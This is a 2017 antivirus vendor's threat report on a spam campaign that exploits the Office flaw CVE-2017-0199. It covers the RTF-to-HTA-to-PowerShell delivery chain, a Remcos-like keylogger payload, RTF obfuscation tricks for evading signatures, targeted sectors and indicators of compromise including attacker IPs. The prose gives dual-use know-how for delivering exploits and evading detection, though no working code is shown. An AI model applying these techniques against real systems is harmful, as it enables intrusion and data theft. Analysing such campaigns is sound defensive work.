malspam campaign using cve-2017-0199 targets...

© 2017 Quick Heal Technologies Limited

Malspam Campaign using CVE-2017-0199 Targets Manufacturing,

Pharmaceutical and other important Industries

This vulnerability (CVE-2017-0199) triggers due to the improper handling of HTA file while parsing a

crafted RTF file having an embedded OLE2 link object. Attackers use crafted RTF files with doc

extension to exploit the vulnerability. This RTF file contains an embedded OLE2link object as shown

in fig 2.

Fig 2. Embedded OLE2link object

This embedded OLE2 link object points to a remotely hosted HTA file as shown in fig 3.

Fig 3. Link to Remote HTA file

https://en.wikipedia.org/wiki/HTML_Application


RTF exploit analysis

The attack in this campaign starts with a spam email with the exploit RTF doc as an attachment. This RTF file has similar contents as shown in fig 2 and fig 3. Fig 4 shows a snapshot of the spam email.

Fig 4. Spam email

When MS Word opens the RTF attachment, the exploit code requests for the remotely hosted HTA file. Fig 5 shows the downloaded file after the request is made to the remote server.

Fig 5. Malicious, fake RTF File

After analyzing the initial bytes in the downloaded file, it seems that it is an RTF file but it’s not


treated so by MS Word; there is an embedded script located below the fake RTF contents. This script gets executed by ‘mshta.exe’ that downloads the malware via PowerShell.

Payload analysis

After a successful exploitation, the malware payload gets downloaded using PowerShell. PowerShell copies this downloaded malware file to %APPDAT%\jacob.exe and executes it. In order to be persistent, it copies the ‘jacob.vbe’ file to the startup folder. This jacob.exe performs keylogging activities, monitors process activities and logs them into a file called logs.dat, located in

%AppData%\Roaming\remcos. All recorded logs are sent to a remote CnC server (212.7.208.88) by the malware. According to our analysis, this malware shares many similarities with the remcos RAT family. Fig 6 shows the malware’s keylogging activity.

Fig 6. Keylogging activity

Evading signature-based detections

In order to evade signature-based detection, malware actors are continuously evolving their exploits

through RTF obfuscation. There are multiple techniques for achieving this; a few of them are shown

below.

Obfuscation technique 1

URL moniker CLSID is obfuscated using control word ’\*’.

https://en.wikipedia.org/wiki/HTML_Application


Fig 7.


Dummy tags are added to obfuscate URL moniker CLSID.

Fig 8.


Tab control word is used to obfuscate the URL string.


Fig 9.

Targeted organizations

Fig 10 represents the statistics of organizations targeted by the malicious campaign.

Fig 10

The manufacturing sector seems to be the most favored target followed by pharmaceuticals, exports, and hotels.


Dominating all office exploits

After disclosure, the detection count of the exploit used in this campaign is growing day by day. This only shows that many malware actors are adopting and using this vulnerability. The below statistics shows the exploit’s growing usage.

Office exploit statistics for Q1 2017

Fig 11

Office exploit statistics for Q2 2017

Fig 12

As shown in fig 11, CVE-2012-0158 has the highest count. In fact, it has had the highest count for the


last 3 years now. However, in Q2 (fig 12), CVE-2017-0199 had the highest detection count; it gained

popularity in a short time period.

Malware actors have found the most reliable and prominent way to deliver malware through the MS

Office vulnerability CVE-2017-0199. Attackers are easily creating exploits using readily available

POCs and delivering various malware. We recommend our users to apply the latest security updates

from Microsoft and keep their antivirus software up-to-date.

Indicators of compromise:

862172F84680456A0BA662F0FE3F56BF

4705476555FC8FCCB28DDAFFC65D2761

271AF4589D175F1725724D948A63E840

95.211.209.223

212.7.208.88

malspam campaign using cve-2017-0199 targets...

Documents